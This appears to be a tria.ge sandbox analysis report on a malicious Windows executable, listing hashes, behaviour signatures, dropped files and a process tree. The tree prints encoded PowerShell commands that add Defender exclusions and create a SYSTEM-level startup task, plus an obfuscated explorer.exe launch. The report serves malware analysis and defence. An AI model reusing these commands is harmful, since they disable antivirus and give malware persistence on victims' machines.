Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    299s
  • max time network
    303s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17/09/2022, 10:23

General

  • Target

    af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe

  • Size

    2.5MB

  • MD5

    0119f6316586f89f83c24254c6927dd9

  • SHA1

    eb462b622d6038638889154839238105a17f508b

  • SHA256

    af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

  • SHA512

    f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

  • SSDEEP

    49152:35mGlO0aBsajwiCzLaeG862uwnYn9fRLdrAoVMkTEHMUHqyuWoG:0G8/Bspp/p+3rjspTj

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
    "C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3044
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "qwfqwf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\system32\schtasks.exe
        schtasks /run /tn "qwfqwf"
        3⤵
          PID:4240
    • C:\Program Files\qwfqwf.exe
      "C:\Program Files\qwfqwf.exe"
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:900
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe "dplckqvqeii"
        2⤵
          PID:8
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe oiwyeszwfgcchj0 XofLACsdV31j9ZQMDeZoqGi8Jt8J9pT+LaLT9/h7mc2lwG87CaVN5EzLnei9FHVsjt/hBqk2cTgsmCQzP63vQgf+54VyKHwwH69NepkH8M2stSb71uK1KIJJmTYhpCUFgEOsuzY0niiQhO4IOHEE9e4sENaUmjYuxDw5wrLuyC8LykQtm4N+vgPtPiXrgni2TUdtqXmIDR4R+72aCV7DHwsbx1WEqZrFFqJymbMq1JZVnZbh+OEPkwxlN7+zLObs1FTuo2sWS54ALgasRhnsT7kWRUUmlyabrkMK2DQmwu3LW0d6p7k8lJ5VMjQ/Cjfpy1KQsqtQ4oDh8dL288eS3kSVSx4v69CksqYI4pJt2Y4KBNDs/GHeKAzo6Bc9UNzCMef/jPbcIDe3Yp/2LYV30gzhg5rQINuyoxM58Mu8THf4E8smMaTwy1yf3v0rAXnQmaDr2jTmVoyq4UNdb8issfE5UQm2tLrv+MzA/f/rHvLGjTkGxL+MU70e1VSwZSudke4N28PyHGuhSiTevP6g3A==
          2⤵
          • Executes dropped EXE
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4576

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\qwfqwf.exe

        Filesize

        2.5MB

        MD5

        0119f6316586f89f83c24254c6927dd9

        SHA1

        eb462b622d6038638889154839238105a17f508b

        SHA256

        af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

        SHA512

        f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

      • C:\Program Files\qwfqwf.exe

        Filesize

        2.5MB

        MD5

        0119f6316586f89f83c24254c6927dd9

        SHA1

        eb462b622d6038638889154839238105a17f508b

        SHA256

        af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

        SHA512

        f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        ad5cd538ca58cb28ede39c108acb5785

        SHA1

        1ae910026f3dbe90ed025e9e96ead2b5399be877

        SHA256

        c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

        SHA512

        c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        edfe53d946955f3d8b879ea0a696c7bc

        SHA1

        636d2a5429b39fcb41dc0b4a977adcb0acfd5522

        SHA256

        3e4fcf3a794d68b42ba9b48162571f7076c65b2edf8a643258a8cc777ad054ea

        SHA512

        1107360413a9c603e12168cef5354e6353ef0645710a510be8fa36b7603b6eaf593bdc278ccc17215c2338f3076540f6228bdd96e2a14068669155d2c9c8293d

      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        811d351aabd7b708fef7683cf5e29e15

        SHA1

        06fd89e5a575f45d411cf4b3a2d277e642e73dbb

        SHA256

        0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

        SHA512

        702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        302a7c179ef577c237c5418fb770fd27

        SHA1

        343ef00d1357a8d2ff6e1143541a8a29435ed30c

        SHA256

        9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

        SHA512

        f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

      • memory/8-605-0x000001B1BD8A0000-0x000001B1BD8A7000-memory.dmp

        Filesize

        28KB

      • memory/8-602-0x000001B1BDFD0000-0x000001B1BDFD6000-memory.dmp

        Filesize

        24KB

      • memory/900-566-0x000001F0C28D0000-0x000001F0C28EC000-memory.dmp

        Filesize

        112KB

      • memory/2484-120-0x0000000000660000-0x00000000008DA000-memory.dmp

        Filesize

        2.5MB

      • memory/3160-247-0x00000289694A0000-0x00000289694AA000-memory.dmp

        Filesize

        40KB

      • memory/3160-208-0x0000028969480000-0x000002896949C000-memory.dmp

        Filesize

        112KB

      • memory/3160-214-0x0000028969970000-0x0000028969A29000-memory.dmp

        Filesize

        740KB

      • memory/3340-129-0x000002033C520000-0x000002033C596000-memory.dmp

        Filesize

        472KB

      • memory/3340-126-0x0000020324170000-0x0000020324192000-memory.dmp

        Filesize

        136KB

      • memory/4576-609-0x00000000001A0000-0x00000000001C0000-memory.dmp

        Filesize

        128KB

      • memory/4864-597-0x00000000023B0000-0x00000000023BA000-memory.dmp

        Filesize

        40KB

      • memory/4864-606-0x0000000002400000-0x0000000002412000-memory.dmp

        Filesize

        72KB

      • memory/4864-610-0x0000000180000000-0x000000018001D000-memory.dmp

        Filesize

        116KB